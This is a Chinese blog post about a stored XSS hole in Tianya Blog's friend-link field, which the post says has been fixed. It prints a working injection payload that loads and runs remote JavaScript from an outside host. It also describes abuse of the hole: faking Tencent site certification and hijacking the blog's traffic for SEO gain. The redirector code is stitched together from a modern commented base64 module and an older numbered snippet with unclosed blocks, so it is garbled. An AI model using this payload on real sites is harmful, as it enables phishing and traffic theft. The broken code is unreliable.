
2014年6月天涯博客友情链接xss漏洞

时间:2015-06-11 08:48 作者:QQ地带

该漏洞天涯博客已于昨天下午修复。在添加友情链接时,在地址一栏填入以下代码:

  1. http://'><img//src="#"//onerror='eval("$.get\u0053cript(\u0022//oicqzone.com/test.js?/\u0022)");// 

这里的js大家就可以无限发挥了。这两天网上利用得比较多的有:

一、伪造网站腾讯认证

原理:利用天涯博客参数跳转,js代码:

 

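  (function () {
      'use strict';

      // RFC 4648 alphabet; the index of a character is its 6-bit value.
      var ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

      // Reverse lookup keyed by char code, so decoding is O(1) per character.
      // A sparse array: any code outside the alphabet reads back as undefined,
      // and there are no prototype lookups to trip over when the input is
      // untrusted (the original did a linear scan of the table per character).
      var REVERSE = [];
      for (var a = 0; a < ALPHABET.length; ++a) {
          REVERSE[ALPHABET.charCodeAt(a)] = a;
      }

      /**
       * Convert a JS string to its UTF-8 byte sequence.
       * A valid surrogate pair is combined into one 4-byte sequence (the
       * original encoded each half as its own 3-byte sequence, i.e. not real
       * UTF-8); a lone surrogate is still emitted as a 3-byte sequence so that
       * previously encoded data keeps round-tripping.
       * @param {string} str
       * @returns {number[]} bytes, each 0..255
       */
      function toUtf8Bytes(str) {
          var bytes = [];
          for (var i = 0, len = str.length; i < len; ++i) {
              var cp = str.charCodeAt(i);
              // Fold a high surrogate together with a following low surrogate.
              if (cp >= 0xD800 && cp <= 0xDBFF && i + 1 < len) {
                  var lo = str.charCodeAt(i + 1);
                  if (lo >= 0xDC00 && lo <= 0xDFFF) {
                      cp = 0x10000 + ((cp - 0xD800) << 10) + (lo - 0xDC00);
                      ++i;
                  }
              }
              if (cp < 0x80) {
                  bytes.push(cp);
              } else if (cp < 0x800) {
                  bytes.push(0xC0 | (cp >> 6), 0x80 | (cp & 0x3F));
              } else if (cp < 0x10000) {
                  bytes.push(0xE0 | (cp >> 12), 0x80 | ((cp >> 6) & 0x3F), 0x80 | (cp & 0x3F));
              } else {
                  // Code points above U+10FFFF cannot arise from a JS string, so
                  // the 5- and 6-byte forms of the original are dropped (RFC 3629).
                  bytes.push(0xF0 | (cp >> 18), 0x80 | ((cp >> 12) & 0x3F), 0x80 | ((cp >> 6) & 0x3F), 0x80 | (cp & 0x3F));
              }
          }
          return bytes;
      }

      /**
       * Standard base64 of a byte array, with '=' padding.
       * @param {number[]} bytes values 0..255
       * @returns {string}
       */
      function bytesToBase64(bytes) {
          var out = '';
          var i = 0;
          var len = bytes.length;
          // Three bytes make four characters.
          for (; i + 2 < len; i += 3) {
              var n = (bytes[i] << 16) | (bytes[i + 1] << 8) | bytes[i + 2];
              out += ALPHABET.charAt(n >> 18) +
                  ALPHABET.charAt((n >> 12) & 63) +
                  ALPHABET.charAt((n >> 6) & 63) +
                  ALPHABET.charAt(n & 63);
          }
          // One or two trailing bytes are zero-padded and marked with '='.
          var rest = len - i;
          if (rest === 1) {
              var n1 = bytes[i] << 16;
              out += ALPHABET.charAt(n1 >> 18) + ALPHABET.charAt((n1 >> 12) & 63) + '==';
          } else if (rest === 2) {
              var n2 = (bytes[i] << 16) | (bytes[i + 1] << 8);
              out += ALPHABET.charAt(n2 >> 18) +
                  ALPHABET.charAt((n2 >> 12) & 63) +
                  ALPHABET.charAt((n2 >> 6) & 63) + '=';
          }
          return out;
      }

      /**
       * Decode base64 text into bytes.
       * Lenient on purpose, matching the original: characters outside the
       * alphabet (whitespace, URL noise) are skipped. The first '=' ends the
       * data; leftover bits that do not fill a byte are discarded rather than
       * emitted as a short "byte" as the original did for unpadded input.
       * @param {string} b64
       * @returns {number[]} bytes, each 0..255
       */
      function base64ToBytes(b64) {
          var bytes = [];
          var acc = 0;   // bit accumulator; at most 12 live bits at any time
          var bits = 0;  // number of live bits in acc
          for (var i = 0, len = b64.length; i < len; ++i) {
              var code = b64.charCodeAt(i);
              if (code === 0x3D) {
                  break;  // '=' padding: nothing meaningful can follow
              }
              var v = REVERSE[code];
              if (v === undefined) {
                  continue;
              }
              acc = ((acc << 6) | v) & 0xFFFF;
              bits += 6;
              if (bits >= 8) {
                  bits -= 8;
                  bytes.push((acc >> bits) & 0xFF);
              }
          }
          return bytes;
      }

      /**
       * Decode a UTF-8 byte sequence into UTF-16 code units.
       * Supplementary characters come back as a surrogate pair, so the result
       * can be passed straight to String.fromCharCode (the original returned a
       * single value above 0xFFFF there, which fromCharCode truncates). A
       * truncated or malformed sequence yields U+FFFD instead of reading past
       * the end; overlong forms and UTF-8-encoded surrogates are not rejected,
       * for compatibility with data produced by the old encoder.
       * @param {number[]} bytes
       * @returns {number[]} code units, each 0..0xFFFF
       */
      function utf8BytesToCodeUnits(bytes) {
          var units = [];
          var i = 0;
          var len = bytes.length;
          while (i < len) {
              var lead = bytes[i++];
              var cp;
              var extra;
              if (lead < 0x80) {
                  cp = lead;
                  extra = 0;
              } else if ((lead & 0xE0) === 0xC0) {
                  cp = lead & 0x1F;
                  extra = 1;
              } else if ((lead & 0xF0) === 0xE0) {
                  cp = lead & 0x0F;
                  extra = 2;
              } else if ((lead & 0xF8) === 0xF0) {
                  cp = lead & 0x07;
                  extra = 3;
              } else {
                  cp = 0xFFFD;  // stray continuation byte or a lead byte outside RFC 3629
                  extra = 0;
              }
              while (extra > 0) {
                  if (i >= len || (bytes[i] & 0xC0) !== 0x80) {
                      cp = 0xFFFD;  // sequence cut short; the offending byte is re-read as a lead byte
                      break;
                  }
                  cp = (cp << 6) | (bytes[i] & 0x3F);
                  ++i;
                  --extra;
              }
              if (cp > 0x10FFFF) {
                  cp = 0xFFFD;  // not a Unicode scalar value
              }
              if (cp > 0xFFFF) {
                  cp -= 0x10000;
                  units.push(0xD800 | (cp >> 10), 0xDC00 | (cp & 0x3FF));
              } else {
                  units.push(cp);
              }
          }
          return units;
      }

      var __BASE64 = {
          /**
           * BASE64 encode a string as UTF-8.
           * @param {string} str
           * @returns {string} base64 text with '=' padding
           * @throws {TypeError} when str is not a string (the original silently
           *   returned '' for numbers and threw only for null/undefined)
           */
          encoder: function (str) {
              if (typeof str !== 'string') {
                  throw new TypeError('BASE64.encoder expects a string');
              }
              return bytesToBase64(toUtf8Bytes(str));
          },
          /**
           * BASE64 decode UTF-8 text into UTF-16 code units
           * (one array entry per String.fromCharCode argument).
           * @param {string} _base64Str
           * @returns {number[]} code units, each 0..0xFFFF
           * @throws {TypeError} when _base64Str is not a string
           */
          decoder: function (_base64Str) {
              if (typeof _base64Str !== 'string') {
                  throw new TypeError('BASE64.decoder expects a string');
              }
              return utf8BytesToCodeUnits(base64ToBytes(_base64Str));
          }
      };

      // Publish on the page's global as before; fall back to globalThis so the
      // module also loads outside a browser (e.g. under a test runner).
      var root = typeof window !== 'undefined' ? window : globalThis;
      root.BASE64 = __BASE64;
  })();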
  216.  
  217.   
  // Redirector page: takes the base64 text after "?" in the URL, decodes it
  // to a string and navigates to "http://" + that string.
  // NOTE(review): this is an open redirect. The destination is taken entirely
  // from the untrusted query string and written to location.href with no
  // validation, which is what lets the injected script above bounce a visitor
  // from the blog to an arbitrary site. Defensive fix: resolve the decoded
  // value with new URL(), compare its host against a fixed allowlist, and
  // refuse (or fall back to a safe page) on anything else; a server-side
  // redirect that performs the same check is the usual alternative.
  // The `if` and `for` blocks opened below are never closed in the listing as
  // published — the tail of the snippet appears to have been lost.
  218. var url = location.search; 
  219. if (url.indexOf("?") != -1){  
  220. var str = url.substr(1); 
  // decoder returns an array of character codes, one per fromCharCode call.
  221. var unicode= BASE64.decoder(str) 
  222. str = ''
  223. for(var i = 0 , len =  unicode.length ; i < len ;++i){   
  224.       str += String.fromCharCode(unicode[i]);   
  // Unvalidated navigation target; see the note at the top of this snippet.
  225. window.location.href="http://"+str; 
  // Commented-out variant that framed the target instead of navigating to it
  // (getElementsByTrgName looks like a typo of getElementsByTagName).
  226. //document.getElementsByTrgName("body")[0].innerHTML="<iframe src='http://"+str+"'height='100%'width='100%'></iframe>" 

 

二、利用天涯博客自身权重,做关键词排名。

原理:在js里直接添加跳转链接,这样博客获得的流量会自动跳转到你的相关页面,这里大家都懂的吧。各种利益。

 

 


标签: xss
